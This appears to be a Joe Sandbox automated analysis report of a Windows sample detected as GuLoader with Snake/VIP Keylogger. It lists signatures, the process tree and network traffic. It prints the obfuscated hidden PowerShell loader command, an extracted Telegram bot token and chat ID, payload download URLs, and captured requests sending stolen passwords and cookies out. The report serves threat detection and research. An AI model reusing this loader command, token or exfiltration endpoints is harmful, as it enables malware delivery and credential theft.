Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
pedido-035241.exe

Overview

General Information

Sample name:pedido-035241.exe
Analysis ID:1576204
MD5:68ad57514cfb4e1cb4529556dbbc9b73
SHA1:3681d090c965cd8af1c7bffd6fe5427e997daa41
SHA256:4b0c3d89a63dc1f177379ea05642c3c3b377adc560b26c7a41aebd2ed1afe9ac
Tags:exeuser-James_inthe_box
Infos:

Detection

GuLoader, Snake Keylogger, VIP Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Early bird code injection technique detected
Found malware configuration
Yara detected GuLoader
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Loading BitLocker PowerShell Module
Powershell drops PE file
Queues an APC in another process (thread injection)
Sigma detected: Suspicious Script Execution From Temp Folder
Suspicious powershell command line found
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Msiexec Initiated Connection
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • pedido-035241.exe (PID: 7320 cmdline: "C:\Users\user\Desktop\pedido-035241.exe" MD5: 68AD57514CFB4E1CB4529556DBBC9B73)
    • powershell.exe (PID: 7392 cmdline: powershell.exe -windowstyle hidden "$Veges95=gc -raw 'C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner\takelma.Uns';$Makulaturs=$Veges95.SubString(71268,3);.$Makulaturs($Veges95) " MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7400 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • msiexec.exe (PID: 8000 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot7268913379:AAGd-tQ4vpps-mce2n9ECDznKp3DeHYACWw/sendMessage"}

Threatname: Snake Keylogger

{"Exfil Mode": "Telegram", "Token": "7268913379:AAGd-tQ4vpps-mce2n9ECDznKp3DeHYACWw", "Chat_id": "7763958191", "Version": "4.4"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000006.00000002.2981297005.00000000243D1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
    00000006.00000002.2981297005.00000000244D9000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000006.00000002.2981297005.00000000244D9000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
        00000006.00000002.2981297005.00000000244D9000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
          00000006.00000002.2962912276.0000000004C2B000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
            Click to see the 2 entries

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Suspicious Script Execution From Temp Folder
            Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: powershell.exe -windowstyle hidden "$Veges95=gc -raw 'C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner\takelma.Uns';$Makulaturs=$Veges95.SubString(71268,3);.$Makulaturs($Veges95) ", CommandLine: powershell.exe -windowstyle hidden "$Veges95=gc -raw 'C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner\takelma.Uns';$Makulaturs=$Veges95.SubString(71268,3);.$Makulaturs($Veges95) ", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\pedido-035241.exe", ParentImage: C:\Users\user\Desktop\pedido-035241.exe, ParentProcessId: 7320, ParentProcessName: pedido-035241.exe, ProcessCommandLine: powershell.exe -windowstyle hidden "$Veges95=gc -raw 'C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner\takelma.Uns';$Makulaturs=$Veges95.SubString(71268,3);.$Makulaturs($Veges95) ", ProcessId: 7392, ProcessName: powershell.exe
            Sigma detected: Msiexec Initiated Connection
            Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 172.217.19.174, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 8000, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49778
            Sigma detected: Non Interactive PowerShell Process Spawned
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -windowstyle hidden "$Veges95=gc -raw 'C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner\takelma.Uns';$Makulaturs=$Veges95.SubString(71268,3);.$Makulaturs($Veges95) ", CommandLine: powershell.exe -windowstyle hidden "$Veges95=gc -raw 'C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner\takelma.Uns';$Makulaturs=$Veges95.SubString(71268,3);.$Makulaturs($Veges95) ", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\pedido-035241.exe", ParentImage: C:\Users\user\Desktop\pedido-035241.exe, ParentProcessId: 7320, ParentProcessName: pedido-035241.exe, ProcessCommandLine: powershell.exe -windowstyle hidden "$Veges95=gc -raw 'C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner\takelma.Uns';$Makulaturs=$Veges95.SubString(71268,3);.$Makulaturs($Veges95) ", ProcessId: 7392, ProcessName: powershell.exe

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-16T16:33:31.824733+010028033053Unknown Traffic192.168.2.449812104.21.67.152443TCP
            2024-12-16T16:33:38.136504+010028033053Unknown Traffic192.168.2.449831104.21.67.152443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-16T16:33:27.235984+010028032742Potentially Bad Traffic192.168.2.449800193.122.6.16880TCP
            2024-12-16T16:33:30.173513+010028032742Potentially Bad Traffic192.168.2.449800193.122.6.16880TCP
            2024-12-16T16:33:33.267532+010028032742Potentially Bad Traffic192.168.2.449818193.122.6.16880TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-16T16:33:19.318083+010028032702Potentially Bad Traffic192.168.2.449778172.217.19.174443TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Found malware configuration
            Source: 00000006.00000002.2981297005.00000000243D1000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Token": "7268913379:AAGd-tQ4vpps-mce2n9ECDznKp3DeHYACWw", "Chat_id": "7763958191", "Version": "4.4"}
            Source: msiexec.exe.8000.6.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7268913379:AAGd-tQ4vpps-mce2n9ECDznKp3DeHYACWw/sendMessage"}
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 97.3% probability

            Location Tracking

            barindex
            Tries to detect the country of the analysis system (by using the IP)
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: pedido-035241.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 104.21.67.152:443 -> 192.168.2.4:49806 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.4:49778 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.181.97:443 -> 192.168.2.4:49784 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49880 version: TLS 1.2
            Source: pedido-035241.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: C:\Users\user\Desktop\pedido-035241.exeCode function: 0_2_00405C13 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405C13
            Source: C:\Users\user\Desktop\pedido-035241.exeCode function: 0_2_0040683D FindFirstFileW,FindClose,0_2_0040683D
            Source: C:\Users\user\Desktop\pedido-035241.exeCode function: 0_2_0040290B FindFirstFileW,0_2_0040290B
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 02BEF45Dh6_2_02BEF2C0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 02BEF45Dh6_2_02BEF4AC
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 02BEFC19h6_2_02BEF961

            Networking

            barindex
            Uses the Telegram API (likely for C&C communication)
            Source: unknownDNS query: name: api.telegram.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:745773%0D%0ADate%20and%20Time:%2017/12/2024%20/%2018:38:32%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20745773%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7268913379:AAGd-tQ4vpps-mce2n9ECDznKp3DeHYACWw/sendDocument?chat_id=7763958191&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd1f520a1e05ecHost: api.telegram.orgContent-Length: 581
            Source: global trafficHTTP traffic detected: POST /bot7268913379:AAGd-tQ4vpps-mce2n9ECDznKp3DeHYACWw/sendDocument?chat_id=7763958191&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd1f7597775302Host: api.telegram.orgContent-Length: 7046
            Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
            Source: Joe Sandbox ViewIP Address: 104.21.67.152 104.21.67.152
            Source: Joe Sandbox ViewIP Address: 193.122.6.168 193.122.6.168
            Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: unknownDNS query: name: checkip.dyndns.org
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: unknownDNS query: name: checkip.dyndns.org
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49818 -> 193.122.6.168:80
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49800 -> 193.122.6.168:80
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49778 -> 172.217.19.174:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49812 -> 104.21.67.152:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49831 -> 104.21.67.152:443
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1azRJsiP2GO7H_gWywAD5t_ayrt5FpP0d HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=1azRJsiP2GO7H_gWywAD5t_ayrt5FpP0d&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: unknownHTTPS traffic detected: 104.21.67.152:443 -> 192.168.2.4:49806 version: TLS 1.0
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1azRJsiP2GO7H_gWywAD5t_ayrt5FpP0d HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=1azRJsiP2GO7H_gWywAD5t_ayrt5FpP0d&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:745773%0D%0ADate%20and%20Time:%2017/12/2024%20/%2018:38:32%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20745773%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficDNS traffic detected: DNS query: drive.google.com
            Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
            Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
            Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
            Source: global trafficDNS traffic detected: DNS query: api.telegram.org
            Source: unknownHTTP traffic detected: POST /bot7268913379:AAGd-tQ4vpps-mce2n9ECDznKp3DeHYACWw/sendDocument?chat_id=7763958191&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd1f520a1e05ecHost: api.telegram.orgContent-Length: 581
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 16 Dec 2024 15:33:56 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
            Source: msiexec.exe, 00000006.00000002.2981297005.00000000244D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?L
            Source: msiexec.exe, 00000006.00000002.2981297005.00000000243D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
            Source: msiexec.exe, 00000006.00000002.2981297005.00000000243D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
            Source: msiexec.exe, 00000006.00000002.2981297005.0000000024575000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2981297005.00000000244D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
            Source: msiexec.exe, 00000006.00000002.2981297005.00000000243D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
            Source: msiexec.exe, 00000006.00000002.2981297005.00000000243D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
            Source: pedido-035241.exe, pedido-035241.exe.1.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: msiexec.exe, 00000006.00000002.2981297005.00000000243D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: msiexec.exe, 00000006.00000002.2981297005.00000000243D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
            Source: msiexec.exe, 00000006.00000002.2982840463.000000002569B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: msiexec.exe, 00000006.00000002.2981297005.0000000024575000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2981297005.00000000244B5000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2981297005.00000000244D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
            Source: msiexec.exe, 00000006.00000002.2981297005.00000000244D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
            Source: msiexec.exe, 00000006.00000002.2981297005.00000000244B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
            Source: msiexec.exe, 00000006.00000002.2981297005.00000000244B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:745773%0D%0ADate%20a
            Source: msiexec.exe, 00000006.00000002.2981297005.00000000244D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7268913379:AAGd-tQ4vpps-mce2n9ECDznKp3DeHYACWw/sendDocument?chat_id=7763
            Source: msiexec.exe, 00000006.00000003.2471471790.0000000008957000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2528720464.0000000008957000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2471549255.0000000008957000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
            Source: msiexec.exe, 00000006.00000002.2982840463.000000002569B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: msiexec.exe, 00000006.00000002.2982840463.000000002569B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: msiexec.exe, 00000006.00000002.2982840463.000000002569B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: msiexec.exe, 00000006.00000002.2981297005.0000000024592000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2981297005.00000000244D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
            Source: msiexec.exe, 00000006.00000002.2981297005.000000002458D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enlB
            Source: msiexec.exe, 00000006.00000002.2967421092.00000000088DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
            Source: msiexec.exe, 00000006.00000002.2967421092.00000000088DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1azRJsiP2GO7H_gWywAD5t_ayrt5FpP0d
            Source: msiexec.exe, 00000006.00000003.2530503003.0000000008952000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2967421092.0000000008939000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2528720464.0000000008957000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
            Source: msiexec.exe, 00000006.00000003.2471471790.0000000008957000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2967421092.0000000008939000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2528720464.0000000008957000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2471549255.0000000008957000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1azRJsiP2GO7H_gWywAD5t_ayrt5FpP0d&export=download
            Source: msiexec.exe, 00000006.00000002.2967421092.0000000008939000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1azRJsiP2GO7H_gWywAD5t_ayrt5FpP0d&export=download7
